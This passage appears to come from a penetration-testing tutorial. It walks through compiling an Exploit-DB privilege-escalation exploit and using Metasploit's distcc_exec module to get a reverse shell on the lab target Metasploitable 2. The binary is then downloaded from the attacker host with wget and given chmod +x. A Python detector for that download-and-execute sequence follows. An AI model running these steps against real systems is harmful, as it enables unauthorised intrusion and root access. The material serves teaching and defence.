Shellcodes: No Result
root@yazpistachio# cp /usr/share/exploitdb/exploits/linux/local/8572.c .
root@yazpistachio# gcc -m32 -o tuxbowling 8572.c
root@yazpistachio# cp tuxbowling /var/www/html
Now that the local exploit is staged where we can retrieve it, we can move on to the exploit. Example 6-16 shows exploiting Metasploitable 2 using a vulnerability in a distributed C compiler. Once the system is compromised, you’ll see that I’ve downloaded the local exploit binary to the exploited system. When the file was compiled, the executable bit was set automatically, telling the system it is a program that can be directly executed. Once it’s been downloaded using wget, the file loses any permission bits that were set, meaning we need to reset the executable bit by using chmod +x on the file. Once we’ve set the executable bit, we are ready to work on the privilege escalation.
Example 6-16. Exploiting Metasploitable 2
msf exploit(unix/misc/distcc_exec) > set RHOST 192.168.86.47
RHOST => 192.168.86.47
msf exploit(unix/misc/distcc_exec) > exploit
[*] Started reverse TCP double handler on 192.168.86.30:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo YfrONcWAHdPy0YS1;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "YfrONcWAHdPy0YS1\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.86.30:4444 -> 192.168.86.47:57395) at 2018-02-11 13:25:31 -0700

wget http://192.168.86.30/tuxbowling
--15:24:58--  http://192.168.86.30/tuxbowling
           => `tuxbowling'
Connecting to 192.168.86.30:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7,628 (7.4K)

    0K .......                                   100%  657.70 KB/s

15:24:58 (657.70 KB/s) - `tuxbowling' saved [7628/7628]

chmod +x tuxbowling
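
From the defender's side, the sequence described above (a file fetched with wget, given the executable bit with chmod, then run) is a pattern that can be correlated in process-execution telemetry. The following is an added example, not code from the book: the record layout, the uid values, the timestamps after the download, and the function names are all assumptions made for illustration.

```python
import re
import shlex
from posixpath import basename, join, normpath
from urllib.parse import urlparse

# Constructed process-execution records (simplified layout, not real auditd output).
SAMPLE_LOG = """\
15:24:58 uid=1 pid=5101 cwd=/tmp argv=wget http://192.168.86.30/tuxbowling
15:25:03 uid=1 pid=5102 cwd=/tmp argv=chmod +x tuxbowling
15:25:09 uid=1 pid=5103 cwd=/tmp argv=./tuxbowling
15:26:00 uid=1000 pid=5200 cwd=/home/dev argv=wget http://192.168.86.30/notes.txt
15:26:30 uid=1000 pid=5201 cwd=/home/dev argv=chmod 644 notes.txt
"""
RECORD = re.compile(r"(\S+) uid=(\d+) pid=\d+ cwd=(\S+) argv=(.+)")


def adds_exec(mode):
    """True if a chmod mode argument turns on any execute bit."""
    if re.fullmatch(r"[0-7]{3,4}", mode):
        return any(int(digit) & 1 for digit in mode[-3:])
    return bool(re.search(r"[+=][rwXst]*x", mode))


def find_staged_binaries(log):
    """Correlate download -> chmod +x -> execute for the same uid and path."""
    fetched, findings = {}, {}
    for line in log.splitlines():
        match = RECORD.match(line)
        if not match:
            continue
        ts, uid, cwd, command = match.groups()
        argv = shlex.split(command)
        prog = basename(argv[0])
        if prog == "wget":
            for url in (a for a in argv[1:] if "://" in a):
                name = basename(urlparse(url).path) or "index.html"
                fetched[(uid, normpath(join(cwd, name)))] = ts
        elif prog == "chmod" and len(argv) > 2 and adds_exec(argv[1]):
            for target in argv[2:]:
                key = (uid, normpath(join(cwd, target)))
                if key in fetched:
                    findings[key] = {"uid": uid, "path": key[1], "downloaded": fetched[key],
                                     "made_executable": ts, "executed": None}
        else:
            key = (uid, normpath(join(cwd, argv[0])))
            if key in findings and findings[key]["executed"] is None:
                findings[key]["executed"] = ts
    return list(findings.values())
```

Calling find_staged_binaries(SAMPLE_LOG) returns one finding for /tmp/tuxbowling; the notes.txt download is ignored because chmod 644 sets no execute bit.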